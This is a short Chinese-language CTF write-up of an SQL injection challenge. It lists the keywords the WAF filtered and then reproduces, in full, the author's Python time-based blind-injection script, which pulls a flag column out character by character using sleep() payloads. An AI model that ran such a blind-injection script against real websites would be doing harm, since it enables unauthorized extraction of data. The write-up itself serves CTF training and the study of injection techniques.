步骤
上周举办的线上ctf,因为想总结一些sql注入,就把这道题拿出来回忆一下,可能记忆会有误差。
-
给了源码和flag所在位置,明显考的是绕过waf,先测试过滤了以下waf:
select、<、>、=、information、union、
该题没有任何回显,所以只能使用时间盲注。不过由于给出了flag所在位置,不需要查询数据库名、表名、列名等信息,只需要查询表
flllllllag
中列fl4g
的数据即可。 -
解题时写的盲注脚本,本来想优化一下,由于没有复现环境,只好直接贴上了。
import requests import string url1 = 'http://5cecd397333a476fa6b69d0f64c51a994aaa1667cf6748da.changame.ichunqiu.com/?id=-1' content_str = string.letters + string.digits +'{}-_' def judge_response(payload): headers = {'User-Agent': "Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"} url = url1 + payload #print(url) try: response = requests.get(url=url, headers=headers, timeout=0.5) #print(response.text) return True except: #print('other error') return False def content_value(name): content = '' for i in range(1, 50): for index in content_str: payload = ' or (ascii(mid({},{},1))-{}) and sleep(3)'.format(name, i, ord(index)) response = judge_response(payload) if response: content += index print(content) else: pass return content if __name__=='__main__': fl4g = content_value('fl4g') print(fl4g)
该脚本的判断处应该使用if
进行优化一下,(我没使用if
忘记了是不是被过滤了)